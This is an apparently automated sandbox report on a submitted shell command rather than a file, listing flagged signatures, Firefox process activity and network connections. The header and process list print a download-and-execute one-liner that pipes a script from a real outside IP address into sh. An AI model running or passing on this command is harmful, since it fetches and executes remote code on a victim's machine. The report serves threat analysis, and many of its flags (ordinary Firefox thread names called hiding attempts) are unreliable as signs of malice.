Analysis Overview
Threat Level: Shows suspicious behavior
The file http://bash -c "curl 158.51.126.131/zy.sh -o- | sh";echo -n "H4G0dNRhNFbAIEs3Zt1kvQAnGsk74yXUKHCfnRVLMHR3HYcpf2N1CWn8QBblXcmT5yH16 was found to be: Shows suspicious behavior.
Malicious Activity Summary
Reads hardware information
Checks hardware identifiers (DMI)
Reads CPU attributes
Changes its process name
Checks CPU configuration
Reads runtime system information
Enumerates kernel/hardware configuration
Writes file to tmp directory
cURL User-Agent
MITRE ATT&CK
Enterprise Matrix V16
Analysis: static1
Detonation Overview
Reported
2025-07-03 05:56
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2025-07-03 05:56
Reported
2025-07-03 05:59
Platform
ubuntu2404-amd64-20250610-en
Max time kernel
43s
Max time network
128s
Command Line
Signatures
Checks hardware identifiers (DMI)
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/virtual/dmi/id/product_name | /usr/lib/firefox/firefox-bin | N/A |
Reads hardware information
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/virtual/dmi/id/product_sku | /usr/lib/firefox/firefox-bin | N/A |
Changes its process name
| Description | Indicator | Process | Target |
| Changes the process name, possibly in an attempt to hide itself | AsyncSi~lThread | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | pool-spawner | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | gmain | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | gdbus | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | glean.dispatche | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | IPC I/O Parent | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | IPC I/O Parent | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | IPC I/O Parent | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | Timer | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | Timer | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | Netlink Monitor | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | Netlink Monitor | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | Socket Thread | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | Socket Thread | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | IPDL Background | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | IPDL Background | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | Backgro~Pool #1 | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | Backgro~Pool #1 | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | pool-firefox | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | pool-firefox | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | pool-firefox | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | glxtest:disk$0 | /usr/lib/firefox/glxtest | N/A |
| Changes the process name, possibly in an attempt to hide itself | HTML5 Parser | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | HTML5 Parser | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | JS Watchdog | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | JS Watchdog | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | BGReadURLs | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | BGReadURLs | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | Cache2 I/O | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | Cache2 I/O | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | Cookie | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | Cookie | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | StreamTrans #1 | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | StreamTrans #1 | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | TaskCon~ller #0 | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | TaskCon~ller #1 | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | BgIOThr~Pool #1 | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | BgIOThr~Pool #1 | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | BgIOThr~Pool #2 | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | BgIOThr~Pool #2 | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | Worker Launcher | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | Worker Launcher | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | QuotaManager IO | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | QuotaManager IO | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | Softwar~cThread | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | Softwar~cThread | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | Softwar~cThread | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | Renderer | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | WRWorker#0 | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | Renderer | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | WRWorker#0 | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | WRWorkerLP#0 | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | WRWorkerLP#0 | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | Glyph rasterize | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | WrGlyph~terizer | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | Compositor | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | Compositor | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | CanvasRenderer | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | CanvasRenderer | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | ImageIO | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | ImageIO | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | IPC Launch | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | IPC Launch | /usr/lib/firefox/firefox-bin | N/A |
| Changes the process name, possibly in an attempt to hide itself | Permission | /usr/lib/firefox/firefox-bin | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/lib/firefox/firefox-bin | N/A |
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/present | /usr/lib/firefox/firefox-bin | N/A |
| File opened for reading | /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq | /usr/lib/firefox/firefox-bin | N/A |
| File opened for reading | /sys/devices/system/cpu/cpu0/cache/index2/size | /usr/lib/firefox/firefox-bin | N/A |
| File opened for reading | /sys/devices/system/cpu/possible | /usr/lib/firefox/firefox-bin | N/A |
| File opened for reading | /sys/devices/system/cpu/present | /usr/lib/firefox/firefox-bin | N/A |
| File opened for reading | /sys/devices/system/cpu/possible | /usr/lib/firefox/firefox-bin | N/A |
| File opened for reading | /sys/devices/system/cpu/cpu0/cache/index3/size | /usr/lib/firefox/firefox-bin | N/A |
| File opened for reading | /sys/devices/system/cpu/cpu0/topology/core_cpus | /usr/lib/firefox/firefox-bin | N/A |
| File opened for reading | /sys/devices/system/cpu/possible | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/devices/system/cpu/cpu0/cpu_capacity | /usr/lib/firefox/glxtest | N/A |
Enumerates kernel/hardware configuration
| Description | Indicator | Process | Target |
| File opened for reading | /sys/bus/pci/devices/0000:00:04.0/device | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:04.0/class | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:05.0/vendor | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:02.0/class | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:01.1/device | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:01.0/class | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:05.0/class | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:04.0/vendor | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/devices/pci0000:00/0000:00:02.0/subsystem_vendor | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/devices/pci0000:00/0000:00:02.0/subsystem_device | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/fs/cgroup/system.slice/agent.service/cpu.max | /usr/lib/firefox/firefox-bin | N/A |
| File opened for reading | /sys/devices/system/node | /usr/lib/firefox/firefox-bin | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:03.0/device | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:03.0/class | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:00.0/device | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/devices/pci0000:00/0000:00:02.0/vendor | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/fs/cgroup/system.slice/agent.service/cpu.max | /usr/lib/firefox/firefox-bin | N/A |
| File opened for reading | /sys/module/apparmor/parameters/enabled | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:06.0/vendor | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:06.0/class | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/devices/pci0000:00/0000:00:02.0/drm/card1 | /usr/lib/firefox/firefox-bin | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:00.0/vendor | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:00.0/class | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:05.0/device | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:02.0/vendor | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:03.0/vendor | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:01.3/class | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/devices/pci0000:00/0000:00:02.0/uevent | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:02.0/device | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:06.0/device | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:01.1/class | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:01.3/device | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:01.0/vendor | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/devices/pci0000:00/0000:00:02.0/device | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/class/drm/card0/device/boot_vga | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/devices/pci0000:00/0000:00:02.0/drm/renderD128 | /usr/lib/firefox/firefox-bin | N/A |
| File opened for reading | /sys/kernel/security/apparmor/features/dbus/mask | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:01.3/vendor | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/devices/pci0000:00/0000:00:02.0 | /usr/lib/firefox/firefox-bin | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:01.1/vendor | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:01.0/device | /usr/lib/firefox/glxtest | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/fd/40 | /usr/lib/firefox/firefox-bin | N/A |
| File opened for reading | /proc/self/mountinfo | /usr/lib/firefox/firefox-bin | N/A |
| File opened for reading | /proc/mounts | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/2193/stat | /usr/lib/firefox/firefox-bin | N/A |
| File opened for reading | /proc/2101/stat | /usr/lib/firefox/firefox-bin | N/A |
| File opened for reading | /proc/self/fd/44 | /usr/lib/firefox/firefox-bin | N/A |
| File opened for reading | /proc/self/fd/102 | /usr/lib/firefox/firefox-bin | N/A |
| File opened for reading | /proc/self/stat | /usr/lib/firefox/firefox-bin | N/A |
| File opened for reading | /proc/filesystems | /usr/libexec/gvfsd-fuse | N/A |
| File opened for reading | /proc/self/fd/80 | /usr/lib/firefox/firefox-bin | N/A |
| File opened for reading | /proc/2256/stat | /usr/lib/firefox/firefox-bin | N/A |
| File opened for reading | /proc/self/maps | /usr/lib/firefox/firefox-bin | N/A |
| File opened for reading | /proc/sys/kernel/cap_last_cap | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/filesystems | /usr/lib/firefox/firefox-bin | N/A |
| File opened for reading | /proc/2156/cmdline | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/self/task/2196/stat | /usr/lib/firefox/firefox-bin | N/A |
| File opened for reading | /proc/self/task/2239/stat | /usr/lib/firefox/firefox-bin | N/A |
| File opened for reading | /proc/2109/cmdline | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/self/cgroup | /usr/lib/firefox/firefox-bin | N/A |
| File opened for reading | /proc/filesystems | /usr/lib/firefox/firefox-bin | N/A |
| File opened for reading | /proc/filesystems | /usr/libexec/xdg-document-portal | N/A |
| File opened for reading | /proc/self/status | /usr/lib/firefox/firefox-bin | N/A |
| File opened for reading | /proc/self/mountinfo | /usr/lib/firefox/firefox-bin | N/A |
| File opened for reading | /proc/self/task/2103/stat | /usr/lib/firefox/firefox-bin | N/A |
| File opened for reading | /proc/self/task/2203/stat | /usr/lib/firefox/firefox-bin | N/A |
| File opened for reading | /proc/self/fd/88 | /usr/lib/firefox/firefox-bin | N/A |
| File opened for reading | /proc/self/fd/96 | /usr/lib/firefox/firefox-bin | N/A |
| File opened for reading | /proc/2150/cmdline | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/self/fd/56 | /usr/lib/firefox/firefox-bin | N/A |
| File opened for reading | /proc/2245/stat | /usr/lib/firefox/firefox-bin | N/A |
| File opened for reading | /proc/self/fd | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/2058/attr/apparmor/current | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/filesystems | /usr/libexec/xdg-permission-store | N/A |
| File opened for reading | /proc/self/task/2172/comm | /usr/libexec/xdg-desktop-portal | N/A |
| File opened for reading | /proc/self/fd/66 | /usr/lib/firefox/firefox-bin | N/A |
| File opened for reading | /proc/self/task/2247/stat | /usr/lib/firefox/firefox-bin | N/A |
| File opened for reading | /proc/self/fd | /usr/bin/dbus-launch | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/self/fd/16 | /usr/lib/firefox/firefox-bin | N/A |
| File opened for reading | /proc/self/maps | /usr/lib/firefox/firefox-bin | N/A |
| File opened for reading | /proc/self/fd/118 | /usr/lib/firefox/firefox-bin | N/A |
| File opened for reading | /proc/self/task/2260/stat | /usr/lib/firefox/firefox-bin | N/A |
| File opened for reading | /proc/self/cgroup | /usr/lib/firefox/firefox-bin | N/A |
| File opened for reading | /proc/filesystems | /usr/libexec/at-spi-bus-launcher | N/A |
| File opened for reading | /proc/2106/cmdline | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/self/fd/54 | /usr/lib/firefox/firefox-bin | N/A |
| File opened for reading | /proc/filesystems | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /proc/filesystems | /usr/libexec/xdg-desktop-portal | N/A |
| File opened for reading | /proc/2133/cmdline | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/2145/cmdline | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/2058/status | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/filesystems | /usr/libexec/xdg-desktop-portal-gtk | N/A |
| File opened for reading | /proc/filesystems | /usr/libexec/gvfsd | N/A |
| File opened for reading | /proc/self/task/2038/stat | /usr/lib/firefox/firefox-bin | N/A |
| File opened for reading | /proc/self/stat | /usr/lib/firefox/firefox-bin | N/A |
| File opened for reading | /proc/2036/cmdline | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/self/fd/38 | /usr/lib/firefox/firefox-bin | N/A |
| File opened for reading | /proc/self/fd/46 | /usr/lib/firefox/firefox-bin | N/A |
| File opened for reading | /proc/2126/cmdline | /usr/bin/dbus-daemon | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/firefox/.parentlock | /usr/lib/firefox/firefox-bin | N/A |
cURL User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
Processes
/usr/bin/firefox
[firefox -new-tab http://bash -c "curl 158.51.126.131/zy.sh -o- | sh";echo -n "H4G0dNRhNFbAIEs3Zt1kvQAnGsk74yXUKHCfnRVLMHR3HYcpf2N1CWn8QBblXcmT5yH16]
/usr/lib/firefox/firefox-bin
[firefox -new-tab http://bash -c "curl 158.51.126.131/zy.sh -o- | sh";echo -n "H4G0dNRhNFbAIEs3Zt1kvQAnGsk74yXUKHCfnRVLMHR3HYcpf2N1CWn8QBblXcmT5yH16]
/usr/lib/firefox/crashhelper
[/usr/lib/firefox/crashhelper 2036 9 /tmp/ 10 12]
/usr/local/sbin/dbus-launch
[dbus-launch --autolaunch=36e6eb39a6fa405996e79cad2731865d --binary-syntax --close-stderr]
/usr/local/bin/dbus-launch
[dbus-launch --autolaunch=36e6eb39a6fa405996e79cad2731865d --binary-syntax --close-stderr]
/usr/sbin/dbus-launch
[dbus-launch --autolaunch=36e6eb39a6fa405996e79cad2731865d --binary-syntax --close-stderr]
/usr/bin/dbus-launch
[dbus-launch --autolaunch=36e6eb39a6fa405996e79cad2731865d --binary-syntax --close-stderr]
/usr/bin/dbus-daemon
[/usr/bin/dbus-daemon --syslog-only --fork --print-pid 5 --print-address 7 --session]
/usr/local/sbin/dbus-launch
[dbus-launch --autolaunch=36e6eb39a6fa405996e79cad2731865d --binary-syntax --close-stderr]
/usr/local/bin/dbus-launch
[dbus-launch --autolaunch=36e6eb39a6fa405996e79cad2731865d --binary-syntax --close-stderr]
/usr/sbin/dbus-launch
[dbus-launch --autolaunch=36e6eb39a6fa405996e79cad2731865d --binary-syntax --close-stderr]
/usr/bin/dbus-launch
[dbus-launch --autolaunch=36e6eb39a6fa405996e79cad2731865d --binary-syntax --close-stderr]
/usr/lib/firefox/glxtest
[/usr/lib/firefox/glxtest -f 17]
/usr/local/sbin/dbus-launch
[dbus-launch --autolaunch=36e6eb39a6fa405996e79cad2731865d --binary-syntax --close-stderr]
/usr/local/bin/dbus-launch
[dbus-launch --autolaunch=36e6eb39a6fa405996e79cad2731865d --binary-syntax --close-stderr]
/usr/sbin/dbus-launch
[dbus-launch --autolaunch=36e6eb39a6fa405996e79cad2731865d --binary-syntax --close-stderr]
/usr/bin/dbus-launch
[dbus-launch --autolaunch=36e6eb39a6fa405996e79cad2731865d --binary-syntax --close-stderr]
/usr/lib/firefox/firefox-bin
[/usr/lib/firefox/firefox-bin -contentproc -ipcHandle 0 -initialChannelId {0cd4c6bc-69f1-486e-bc88-aabae6e45197} -parentPid 2036 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser 1 forkserver]
/usr/libexec/xdg-desktop-portal
[/usr/libexec/xdg-desktop-portal]
/usr/libexec/at-spi-bus-launcher
[/usr/libexec/at-spi-bus-launcher]
/usr/libexec/xdg-document-portal
[/usr/libexec/xdg-document-portal]
/usr/libexec/xdg-permission-store
[/usr/libexec/xdg-permission-store]
/usr/bin/fusermount3
[fusermount3 -o rw,nosuid,nodev,fsname=portal,auto_unmount,subtype=portal -- /root/.cache/doc]
/usr/libexec/xdg-desktop-portal-gtk
[/usr/libexec/xdg-desktop-portal-gtk]
/usr/libexec/gvfsd
[/usr/libexec/gvfsd]
/usr/libexec/gvfsd-fuse
[/usr/libexec/gvfsd-fuse /root/.gvfs -f]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | ads.mozilla.org | udp |
| US | 8.8.8.8:53 | ads.mozilla.org | udp |
| US | 8.8.8.8:53 | merino.services.mozilla.com | udp |
| US | 8.8.8.8:53 | merino.services.mozilla.com | udp |
| US | 34.110.138.217:443 | merino.services.mozilla.com | udp |
| AU | 1.1.1.1:53 | ads.mozilla.org | udp |
| AU | 1.1.1.1:53 | ads.mozilla.org | udp |
| AU | 1.1.1.1:53 | mc.prod.ads.prod.webservices.mozgcp.net | udp |
| US | 158.51.126.131:80 | 158.51.126.131 | tcp |
| US | 158.51.126.131:80 | 158.51.126.131 | tcp |
| US | 158.51.126.131:80 | 158.51.126.131 | tcp |
| US | 158.51.126.131:80 | 158.51.126.131 | tcp |
| US | 158.51.126.131:80 | 158.51.126.131 | tcp |
| US | 158.51.126.131:80 | 158.51.126.131 | tcp |
| US | 158.51.126.131:80 | 158.51.126.131 | tcp |
| US | 158.51.126.131:80 | 158.51.126.131 | tcp |
| US | 158.51.126.131:80 | 158.51.126.131 | tcp |
| US | 158.51.126.131:80 | 158.51.126.131 | tcp |
| US | 158.51.126.131:80 | 158.51.126.131 | tcp |